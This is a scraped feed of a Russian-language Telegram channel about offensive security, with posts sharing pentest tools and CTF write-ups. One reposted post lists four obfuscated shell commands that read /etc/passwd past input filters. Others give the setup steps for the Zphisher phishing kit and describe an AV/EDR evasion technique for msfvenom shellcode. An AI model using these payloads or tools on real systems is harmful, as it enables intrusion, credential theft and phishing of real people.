Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 008
Obunachilar
-124 soatlar
+27 kunlar
-1230 kunlar
Postlar arxiv
2 008
NMAP Full Guide (You will never ask about NMAP again)
🔗Ссылка:
https://www.youtube.com/watch?v=JHAMj2vN2oU
Советую посмотреть 👾
2 008
Repost from Proxy Bar
BYPASS
cat ${HOME:0:1}etc${HOME:0:1}passwd
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat `xxd -r -ps <(echo 2f6574632f706173737764)`2 008
Repost from Kali Linux
+1
💻 Zphisher — инструмент фишинга с 30+ шаблонами
git clone --depth=1 https://github.com/htr-tech/zphisher.git
cd zphisher
bash zphisher.sh
Zphisher предназначен для демонстрации того, как работает фишинг и какие при этом используются методы
Разумеется, исключительно в образовательных и этичных целях
🖥 GitHub
@linuxkalii2 008
Repost from AP Security
#pentest
✅ Продолжая тему уклонения
Свежая техника, которая может быть использована для обхода AV/EDR.
С ее помощью можно скрыть хорошо известные и обнаруженные шеллкоды ( в том числе msfvenom), выполняя "на лету" расшифровку отдельных зашифрованных инструкций ассемблера, что делает сканеры памяти бесполезными для данной конкретной страницы памяти.👩💻 GitHub
2 008
Repost from TaipanByte CTF
🔒Blurry HTB Writeup
🔗 Читать далее
#hackthebox #writeup #medium #season5
2 008
Repost from PurpleBear
Nmap-did-what
Бывает что на длительных проектах необходимо постоянно диффать результаты регулярных итераций сканирования, с целью своевременного обнаружения новых потенциально уязвимых хостов и открытых портов. Особенно актуальна такая задача для внутренних
offensive команд в динамичных сегментах инфраструктуры, например, внутреннее облако, где по сути любой пользователь может поднять и развернуть все что угодно...чтобы просто потестить😜
Для тех кому нужна подобная аналитика с визуализацией хочу порекомендовать утилиту - nmap-did-what. Инструмент представляет собой скрипт на python, который парсит XML выхлоп nmap и складывает результаты в SQLite базу данных, которая в свою очередь используется как datasource для контейнера Grafana, развёрнутого с помощью docker compose.
✅ Clone the repository
git clone https://github.com/hackertarget/nmap-did-what.git
cd nmap-did-what
✅ Parse Nmap XML output
python nmap-to-sqlite.py nmap_output.xml
✅ Start the Grafana Container
docker-compose up -d
✅ Access Grafana
http://localhost:3000
На выходе получаем готовый дашборд с результатами сканирования, который можно использовать для дальнейшей аналитики и приоритезации новых потенциальных целей😎2 008
Repost from TaipanByte CTF
🔒Editorial HTB Writeup
Автор:
@FaLLenSkiLL
🔗 Читать далее
#hackthebox #writeup #easy #season5
2 008
Небольшое обновление Obsidian Pentest:
https://github.com/0xHaskar/Obsidian-Pentest
Коммит:
https://github.com/0xHaskar/Obsidian-Pentest/commit/8406c5b9db65a74bd28633b2c5cbadfb365af74a
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
